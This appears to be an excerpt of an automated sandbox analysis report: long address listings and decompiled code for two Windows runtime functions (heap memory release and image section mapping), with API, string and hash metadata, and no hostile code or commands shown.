                                                                                                                            0x6b1d3b7d
                                                                                                                            0x6b1d3b7d
                                                                                                                            0x6b1d3b82
                                                                                                                            0x6b1d3b84
                                                                                                                            0x6b1d3b87
                                                                                                                            0x6b1d3b8a
                                                                                                                            0x6b1d3b8d
                                                                                                                            0x6b1d3b90
                                                                                                                            0x6b1d3b90
                                                                                                                            0x6b1d3b97
                                                                                                                            0x6b1d3b97
                                                                                                                            0x6b1d3ba7
                                                                                                                            0x6b1d3baa
                                                                                                                            0x6b1d3bad
                                                                                                                            0x6b1d3bad
                                                                                                                            0x6b1d3bb7
                                                                                                                            0x6b1d3bb7
                                                                                                                            0x6b1d3bbc
                                                                                                                            0x6b1d3bbf
                                                                                                                            0x6b1d3bc1
                                                                                                                            0x6b1d3bc7
                                                                                                                            0x6b1d3bcd
                                                                                                                            0x6b1d3bd5
                                                                                                                            0x6b1d3bd8
                                                                                                                            0x6b1d3bda
                                                                                                                            0x6b1d3be1
                                                                                                                            0x6b1d3be4
                                                                                                                            0x6b1d3be7
                                                                                                                            0x6b1d3bea
                                                                                                                            0x6b1d3bed
                                                                                                                            0x6b1d3d97
                                                                                                                            0x6b1d3d9c
                                                                                                                            0x6b1d3da8
                                                                                                                            0x6b1d3dad
                                                                                                                            0x6b1d3db0
                                                                                                                            0x6b1d3db2
                                                                                                                            0x6b1d3db5
                                                                                                                            0x6b23020b
                                                                                                                            0x6b230211
                                                                                                                            0x6b230213
                                                                                                                            0x6b230213
                                                                                                                            0x6b1d3dbb
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3dbb
                                                                                                                            0x6b1d3bf3
                                                                                                                            0x6b1d3bf5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3bfb
                                                                                                                            0x6b1d3bfe
                                                                                                                            0x6b1d3bfe
                                                                                                                            0x6b1d3bfe
                                                                                                                            0x6b1d3c02
                                                                                                                            0x6b1d3dd1
                                                                                                                            0x6b1d3dd1
                                                                                                                            0x6b1d3dd7
                                                                                                                            0x6b2300c1
                                                                                                                            0x6b2300c4
                                                                                                                            0x6b1d3c11
                                                                                                                            0x6b1d3c11
                                                                                                                            0x6b1d3c14
                                                                                                                            0x6b2300cf
                                                                                                                            0x6b2300d2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2300d8
                                                                                                                            0x6b2300e6
                                                                                                                            0x6b2300e9
                                                                                                                            0x6b2300ec
                                                                                                                            0x6b2300ef
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2300f5
                                                                                                                            0x6b2300dd
                                                                                                                            0x6b2300e0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2300e0
                                                                                                                            0x6b1d3c1a
                                                                                                                            0x6b1d3c1a
                                                                                                                            0x6b1d3c1d
                                                                                                                            0x6b1d3e20
                                                                                                                            0x6b1d3e23
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3e29
                                                                                                                            0x6b1d3c23
                                                                                                                            0x6b1d3c23
                                                                                                                            0x6b1d3c26
                                                                                                                            0x6b1d3c2c
                                                                                                                            0x6b1d3c2f
                                                                                                                            0x6b1d3c35
                                                                                                                            0x6b1d3c3b
                                                                                                                            0x6b1d3c41
                                                                                                                            0x6b1d3c47
                                                                                                                            0x6b1d3c4d
                                                                                                                            0x6b1d3c59
                                                                                                                            0x6b1d3c5f
                                                                                                                            0x6b1d3c62
                                                                                                                            0x6b1d3c68
                                                                                                                            0x6b1d3c6a
                                                                                                                            0x6b1d3c6d
                                                                                                                            0x6b1d3c74
                                                                                                                            0x6b1d3c79
                                                                                                                            0x6b1d3c7b
                                                                                                                            0x6b1d3c7e
                                                                                                                            0x6b1d3c80
                                                                                                                            0x6b1d3c83
                                                                                                                            0x6b1d3c89
                                                                                                                            0x6b1d3c8b
                                                                                                                            0x6b1d3dea
                                                                                                                            0x6b1d3df1
                                                                                                                            0x6b1d3df2
                                                                                                                            0x6b1d3df5
                                                                                                                            0x6b1d3df8
                                                                                                                            0x6b1d3dfb
                                                                                                                            0x6b1d3dfd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3e03
                                                                                                                            0x6b1d3e07
                                                                                                                            0x6b1d3e42
                                                                                                                            0x6b1d3e49
                                                                                                                            0x6b1d3e4a
                                                                                                                            0x6b1d3e4d
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3e4d
                                                                                                                            0x6b1d3e09
                                                                                                                            0x6b1d3d86
                                                                                                                            0x6b1d3d89
                                                                                                                            0x6b1d3d8c
                                                                                                                            0x6b1d3d8e
                                                                                                                            0x6b1d3e31
                                                                                                                            0x6b1d3e31
                                                                                                                            0x6b1d3d94
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3d94
                                                                                                                            0x6b1d3c91
                                                                                                                            0x6b1d3c91
                                                                                                                            0x6b1d3c94
                                                                                                                            0x6b1d3d23
                                                                                                                            0x6b1d3d23
                                                                                                                            0x6b1d3d27
                                                                                                                            0x6b1d3e16
                                                                                                                            0x6b1d3e16
                                                                                                                            0x6b1d3d2d
                                                                                                                            0x6b1d3d31
                                                                                                                            0x6b2301fe
                                                                                                                            0x6b2301fe
                                                                                                                            0x6b1d3d84
                                                                                                                            0x6b1d3d84
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3d84
                                                                                                                            0x6b1d3d3d
                                                                                                                            0x6b1d3d44
                                                                                                                            0x6b1d3d45
                                                                                                                            0x6b1d3d48
                                                                                                                            0x6b1d3d4f
                                                                                                                            0x6b2301de
                                                                                                                            0x6b2301de
                                                                                                                            0x6b2301e2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2301ea
                                                                                                                            0x6b2301ea
                                                                                                                            0x6b2301eb
                                                                                                                            0x6b2301f9
                                                                                                                            0x00000000
                                                                                                                            0x6b2301f9
                                                                                                                            0x6b1d3d55
                                                                                                                            0x6b1d3d5c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3d62
                                                                                                                            0x6b1d3d66
                                                                                                                            0x6b1d3e55
                                                                                                                            0x6b1d3e5e
                                                                                                                            0x6b1d3e60
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3d75
                                                                                                                            0x6b1d3d75
                                                                                                                            0x6b1d3d79
                                                                                                                            0x6b1d3d7b
                                                                                                                            0x6b1d3d7e
                                                                                                                            0x6b2301c7
                                                                                                                            0x6b2301ca
                                                                                                                            0x6b2301cd
                                                                                                                            0x6b2301d0
                                                                                                                            0x6b2301d3
                                                                                                                            0x6b2301d6
                                                                                                                            0x6b2301d6
                                                                                                                            0x6b1d3d7e
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3d79
                                                                                                                            0x6b1d3d6c
                                                                                                                            0x6b1d3d72
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3d72
                                                                                                                            0x6b1d3c9d
                                                                                                                            0x6b1d3ca0
                                                                                                                            0x6b1d3cab
                                                                                                                            0x6b1d3cae
                                                                                                                            0x6b1d3cb1
                                                                                                                            0x6b1d3cb5
                                                                                                                            0x6b1d3cb7
                                                                                                                            0x6b1d3cd2
                                                                                                                            0x6b1d3cdb
                                                                                                                            0x6b1d3cdb
                                                                                                                            0x6b1d3cde
                                                                                                                            0x6b1d3ce1
                                                                                                                            0x6b1d3ce3
                                                                                                                            0x6b2300fa
                                                                                                                            0x6b2300fd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b230103
                                                                                                                            0x6b230107
                                                                                                                            0x6b230113
                                                                                                                            0x6b230125
                                                                                                                            0x6b23012b
                                                                                                                            0x6b23012e
                                                                                                                            0x6b230131
                                                                                                                            0x00000000
                                                                                                                            0x6b230131
                                                                                                                            0x6b230109
                                                                                                                            0x6b23010d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3ce9
                                                                                                                            0x6b1d3ce9
                                                                                                                            0x6b1d3ce9
                                                                                                                            0x6b1d3cee
                                                                                                                            0x6b230139
                                                                                                                            0x6b230149
                                                                                                                            0x6b23014f
                                                                                                                            0x6b23014f
                                                                                                                            0x6b1d3cf4
                                                                                                                            0x6b1d3cf9
                                                                                                                            0x6b1d3cfb
                                                                                                                            0x6b230160
                                                                                                                            0x6b1d3d01
                                                                                                                            0x6b1d3d01
                                                                                                                            0x6b1d3d01
                                                                                                                            0x6b1d3d06
                                                                                                                            0x6b1d3d09
                                                                                                                            0x6b230184
                                                                                                                            0x6b230184
                                                                                                                            0x6b1d3d0f
                                                                                                                            0x6b1d3d16
                                                                                                                            0x6b1d3d1e
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3d1e
                                                                                                                            0x6b1d3ce3
                                                                                                                            0x6b2300ca
                                                                                                                            0x6b1d3ddd
                                                                                                                            0x6b1d3de0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3de2
                                                                                                                            0x6b1d3c08
                                                                                                                            0x6b1d3c0b
                                                                                                                            0x6b1d3dc9
                                                                                                                            0x6b1d3dcb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3dcb
                                                                                                                            0x00000000
                                                                                                                            0x6b1d3c0b

                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(00000000,6B2AF4D0,00000084,6B1D3A18,00000000,?,?), ref: 6B1D3B05
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,00000000,6B2AF4D0,00000084,6B1D3A18,00000000,?,?), ref: 6B1D3B1A
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,?,?,?,00000000,6B2AF4D0,00000084,6B1D3A18,00000000,?,?), ref: 6B1D3C74
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$Release$Acquire
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1021914862-0
                                                                                                                            • Opcode ID: 6eda059ff0e94afb986fa3a7f2dda6e6df624d53a7d919ffb870bb86cdd428e1
                                                                                                                            • Instruction ID: 55689832bf44c4847435cc7fda6373410673bb4aefae16f87bc957771e888ec3
                                                                                                                            • Opcode Fuzzy Hash: 6eda059ff0e94afb986fa3a7f2dda6e6df624d53a7d919ffb870bb86cdd428e1
                                                                                                                            • Instruction Fuzzy Hash: 76E10271E00658EFCB25CFA9D984A9DFBF5FF48305F20456AE456A7260D778A842CF10
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20AC7B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 205nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 80%
                                                                                                                            			E6B20AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x9
					E6B22D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x6b2c8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1018
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x21
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E6B2196E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E6B283C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E6B2196E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E6B1DB150();
							} else {
								E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E6B1DB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E6B2914FB(_t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E6B1F7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E6B291411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E6B1F7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E6B291411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                                                                                            0x6b20ac85
                                                                                                                            0x6b20ac88
                                                                                                                            0x6b20ac8a
                                                                                                                            0x6b20ac8d
                                                                                                                            0x6b20ac91
                                                                                                                            0x6b20ac99
                                                                                                                            0x6b20ac9c
                                                                                                                            0x6b249f57
                                                                                                                            0x6b249f5b
                                                                                                                            0x6b249f60
                                                                                                                            0x6b249f60
                                                                                                                            0x6b20aca8
                                                                                                                            0x6b20acae
                                                                                                                            0x6b20acda
                                                                                                                            0x6b20acde
                                                                                                                            0x6b20ace8
                                                                                                                            0x6b20aceb
                                                                                                                            0x6b20acee
                                                                                                                            0x00000000
                                                                                                                            0x6b20acee
                                                                                                                            0x6b20acf6
                                                                                                                            0x6b20acb0
                                                                                                                            0x6b20acb0
                                                                                                                            0x6b20acbb
                                                                                                                            0x6b20acbd
                                                                                                                            0x6b20acc0
                                                                                                                            0x6b20acc5
                                                                                                                            0x6b20adae
                                                                                                                            0x6b20adb4
                                                                                                                            0x6b20adb4
                                                                                                                            0x6b20acd4
                                                                                                                            0x6b20acd8
                                                                                                                            0x6b20acf9
                                                                                                                            0x6b20acff
                                                                                                                            0x6b20ad04
                                                                                                                            0x6b20ad08
                                                                                                                            0x6b20ad09
                                                                                                                            0x6b20ad10
                                                                                                                            0x6b20ad12
                                                                                                                            0x6b20ad18
                                                                                                                            0x6b249f6f
                                                                                                                            0x6b249f74
                                                                                                                            0x6b249f76
                                                                                                                            0x6b249f7c
                                                                                                                            0x6b249f84
                                                                                                                            0x6b249f88
                                                                                                                            0x6b249f89
                                                                                                                            0x6b249f90
                                                                                                                            0x6b249f90
                                                                                                                            0x6b249f76
                                                                                                                            0x6b20ad1e
                                                                                                                            0x6b20ad24
                                                                                                                            0x6b20ad26
                                                                                                                            0x6b24a097
                                                                                                                            0x6b24a09b
                                                                                                                            0x6b24a0ba
                                                                                                                            0x6b24a0bf
                                                                                                                            0x6b24a09d
                                                                                                                            0x6b24a0b2
                                                                                                                            0x6b24a0b7
                                                                                                                            0x6b24a0c5
                                                                                                                            0x6b24a0c8
                                                                                                                            0x6b24a0cb
                                                                                                                            0x6b24a0d2
                                                                                                                            0x00000000
                                                                                                                            0x6b20ad2c
                                                                                                                            0x6b20ad2c
                                                                                                                            0x6b20ad2f
                                                                                                                            0x6b20ad34
                                                                                                                            0x6b20ad36
                                                                                                                            0x6b249f97
                                                                                                                            0x6b249f9a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b249fa9
                                                                                                                            0x6b20ad3e
                                                                                                                            0x6b20ad3e
                                                                                                                            0x6b20ad41
                                                                                                                            0x6b249fb3
                                                                                                                            0x6b249fb9
                                                                                                                            0x6b249fc0
                                                                                                                            0x6b249fd0
                                                                                                                            0x6b249fd0
                                                                                                                            0x6b249fc0
                                                                                                                            0x6b20ad4a
                                                                                                                            0x6b20ad50
                                                                                                                            0x6b20ad5c
                                                                                                                            0x6b20ad62
                                                                                                                            0x6b20ad68
                                                                                                                            0x6b20ad6b
                                                                                                                            0x6b20ad6d
                                                                                                                            0x6b249fda
                                                                                                                            0x6b249fdd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b249fec
                                                                                                                            0x00000000
                                                                                                                            0x6b20ad73
                                                                                                                            0x6b20ad73
                                                                                                                            0x6b20ad73
                                                                                                                            0x6b20ad75
                                                                                                                            0x6b20ad75
                                                                                                                            0x6b20ad78
                                                                                                                            0x6b249ff6
                                                                                                                            0x6b249ffc
                                                                                                                            0x6b24a003
                                                                                                                            0x6b24a00e
                                                                                                                            0x6b24a010
                                                                                                                            0x6b24a01b
                                                                                                                            0x6b24a01b
                                                                                                                            0x6b24a01b
                                                                                                                            0x6b24a038
                                                                                                                            0x6b24a038
                                                                                                                            0x6b24a003
                                                                                                                            0x6b20ad84
                                                                                                                            0x6b20ad89
                                                                                                                            0x6b20ad8c
                                                                                                                            0x6b20ad8e
                                                                                                                            0x6b24a042
                                                                                                                            0x6b24a045
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b24a054
                                                                                                                            0x00000000
                                                                                                                            0x6b20ad94
                                                                                                                            0x6b20ad94
                                                                                                                            0x6b20ad94
                                                                                                                            0x6b20ad96
                                                                                                                            0x6b20ad96
                                                                                                                            0x6b20ad99
                                                                                                                            0x6b24a063
                                                                                                                            0x6b24a065
                                                                                                                            0x6b24a070
                                                                                                                            0x6b24a070
                                                                                                                            0x6b24a070
                                                                                                                            0x6b24a08d
                                                                                                                            0x6b24a08d
                                                                                                                            0x6b20ada4
                                                                                                                            0x6b20ada6
                                                                                                                            0x00000000
                                                                                                                            0x6b20ada6
                                                                                                                            0x6b20ad8e
                                                                                                                            0x6b20ad6d
                                                                                                                            0x6b20ad3c
                                                                                                                            0x6b20ad3c
                                                                                                                            0x00000000
                                                                                                                            0x6b20ad3c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20acd8

                                                                                                                            APIs
                                                                                                                            • ZwFreeVirtualMemory.1105(000000FF,-00000018,?,00004000,?,-00000007,00000001,?,-00000018,?), ref: 6B20AD0B
                                                                                                                            • RtlFillMemoryUlong.1105(00000009,?,FEEEFEEE,?,-00000007,00000001,?,-00000018,?), ref: 6B249F5B
                                                                                                                            Strings
                                                                                                                            • HEAP: , xrefs: 6B24A0BA
                                                                                                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 6B24A0CD
                                                                                                                            • HEAP[%wZ]: , xrefs: 6B24A0AD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Memory$FillFreeUlongVirtual
                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                            • API String ID: 3117835691-1340214556
                                                                                                                            • Opcode ID: 51626452e636724640bd7cd746ae1a21290564e527b1e890c6aca095f4557d0a
                                                                                                                            • Instruction ID: e4f45c026570018b61d81e733c8adf5609077bf6487787e43d4f2b75b00520e5
                                                                                                                            • Opcode Fuzzy Hash: 51626452e636724640bd7cd746ae1a21290564e527b1e890c6aca095f4557d0a
                                                                                                                            • Instruction Fuzzy Hash: 4D81D131644689EFD716CBA8C9C4F9ABBF8FF06705F0041A5E5518B692DB3CE940CB10
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20D7CA, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 192nativememoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 74%
                                                                                                                            			E6B20D7CA(signed int __ecx, intOrPtr* __edx, char _a4, long* _a8, void** _a12, intOrPtr* _a16) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				char _v24;
				signed int _v28;
				long _v32;
				char _v36;
				long _v40;
				long _v44;
				void* _v48;
				signed int _v52;
				long _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char* _v76;
				signed int _v80;
				char _v84;
				void* _t70;
				signed int _t77;
				signed int _t83;
				intOrPtr _t97;
				signed int _t99;
				signed int _t100;
				void* _t102;
				signed int _t104;
				void* _t105;
				intOrPtr* _t108;
				long* _t109;
				long _t113;
				void* _t114;
				intOrPtr* _t115;
				signed int _t116;

				_t115 = __edx;
				_t113 = 0;
				_v28 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v24 = 0;
				if(__ecx == 0 || __edx == 0 || _a12 == 0) {
					return 0xc000000d;
				} else {
					_t70 = __ecx & 0xfffffffc;
					RtlImageNtHeader(_t70);
					if(_t70 == 0) {
						_t116 = 0xc000007b;
						L27:
						if(_v8 != 0) {
							_push(_v8);
							E6B2195D0();
							_v8 = _t113;
						}
						if(_v16 != 0) {
							_push(_v16);
							_push(0xffffffff);
							E6B2197A0();
						}
						L25:
						return _t116;
					}
					_t104 = 6;
					asm("sbb ebx, ebx");
					_t105 = 2;
					_t102 = (_t100 & _t104) + _t105;
					if(_a4 != 0) {
						_v36 =  *_t115;
						_v32 =  *((intOrPtr*)(_t115 + 4));
						_v20 = 0;
						_v84 = 0x18;
						L33:
						_v80 = _v80 & 0x00000000;
						L10:
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						_v72 = 0x40;
						_v76 =  &_v36;
						_t77 = E6B20D976( &_v8,  &_v84, _v28);
						_t116 = _t77;
						if(_t113 == 0) {
							_t113 = 0;
							L14:
							if(_t116 < 0) {
								goto L27;
							}
							_push(_v8);
							_push(0x8000000);
							_push(_t102);
							_push(_t113);
							_push(_t113);
							_push(0xf0005);
							_push( &_v12);
							_t116 = E6B2199A0();
							if(_t116 < 0) {
								goto L27;
							}
							_push(_t102);
							_push(_t113);
							_push(1);
							_v44 = _t113;
							_push( &_v24);
							_v40 = _t113;
							_push( &_v44);
							_push(_t113);
							_push(_t113);
							_push( &_v16);
							_push(0xffffffff);
							_push(_v12);
							_t83 = E6B219780();
							_t116 = _t83;
							if(_v12 != 0) {
								_push(_v12);
								_t83 = E6B2195D0();
								_v12 = _t113;
							}
							if(_t116 < 0) {
								goto L27;
							} else {
								RtlImageNtHeader(_v16);
								if(_t83 == 0) {
									_t116 = 0xc000007b;
								}
								if(_t116 < 0) {
									goto L27;
								} else {
									 *_a12 = _v16;
									_t108 = _a16;
									if(_t108 != 0) {
										 *_t108 = _v24;
									}
									_t109 = _a8;
									if(_t109 == 0) {
										if(_v8 != 0) {
											_push(_v8);
											E6B2195D0();
										}
									} else {
										 *_t109 = _v8;
									}
									goto L25;
								}
							}
						}
						_t114 = _v48;
						if(_t114 != 0) {
							asm("lock xadd [edi], eax");
							if((_t77 | 0xffffffff) != 0) {
								goto L12;
							}
							_push( *((intOrPtr*)(_t114 + 4)));
							E6B2195D0();
							_t113 = 0;
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t114);
							L13:
							RtlFreeHeap( *( *[fs:0x30] + 0x18), _t113, _v20);
							goto L14;
						}
						L12:
						_t113 = 0;
						goto L13;
					}
					_t116 = E6B1E65BA(_t105,  *((intOrPtr*)(_t115 + 4)),  &_v36, 0,  &_v60);
					if(_t116 < 0) {
						goto L27;
					}
					_t97 = _v60;
					_t113 = _v32;
					_v20 = _t113;
					if(_t97 != 0) {
						_v36 = _t97;
						_v32 = _v56;
						_t99 = _v52;
					} else {
						_t99 = 0;
					}
					_v84 = 0x18;
					if(_t113 == 0) {
						goto L33;
					} else {
						_v80 = _t99;
						goto L10;
					}
				}
			}






































                                                                                                                            0x6b20d7d6
                                                                                                                            0x6b20d7d9
                                                                                                                            0x6b20d7db
                                                                                                                            0x6b20d7de
                                                                                                                            0x6b20d7e1
                                                                                                                            0x6b20d7e4
                                                                                                                            0x6b20d7e7
                                                                                                                            0x6b20d7ec
                                                                                                                            0x00000000
                                                                                                                            0x6b20d803
                                                                                                                            0x6b20d803
                                                                                                                            0x6b20d807
                                                                                                                            0x6b20d80e
                                                                                                                            0x6b24b180
                                                                                                                            0x6b20d95a
                                                                                                                            0x6b20d95e
                                                                                                                            0x6b24b203
                                                                                                                            0x6b24b206
                                                                                                                            0x6b24b20b
                                                                                                                            0x6b24b20b
                                                                                                                            0x6b20d968
                                                                                                                            0x6b24b213
                                                                                                                            0x6b24b216
                                                                                                                            0x6b24b218
                                                                                                                            0x6b24b218
                                                                                                                            0x6b20d94f
                                                                                                                            0x00000000
                                                                                                                            0x6b20d94f
                                                                                                                            0x6b20d816
                                                                                                                            0x6b20d81d
                                                                                                                            0x6b20d821
                                                                                                                            0x6b20d822
                                                                                                                            0x6b20d828
                                                                                                                            0x6b24b18c
                                                                                                                            0x6b24b192
                                                                                                                            0x6b24b195
                                                                                                                            0x6b24b198
                                                                                                                            0x6b24b19f
                                                                                                                            0x6b24b19f
                                                                                                                            0x6b20d86f
                                                                                                                            0x6b20d872
                                                                                                                            0x6b20d879
                                                                                                                            0x6b20d883
                                                                                                                            0x6b20d88a
                                                                                                                            0x6b20d88d
                                                                                                                            0x6b20d892
                                                                                                                            0x6b20d896
                                                                                                                            0x6b24b1e5
                                                                                                                            0x6b20d8bb
                                                                                                                            0x6b20d8bd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20d8c3
                                                                                                                            0x6b20d8c9
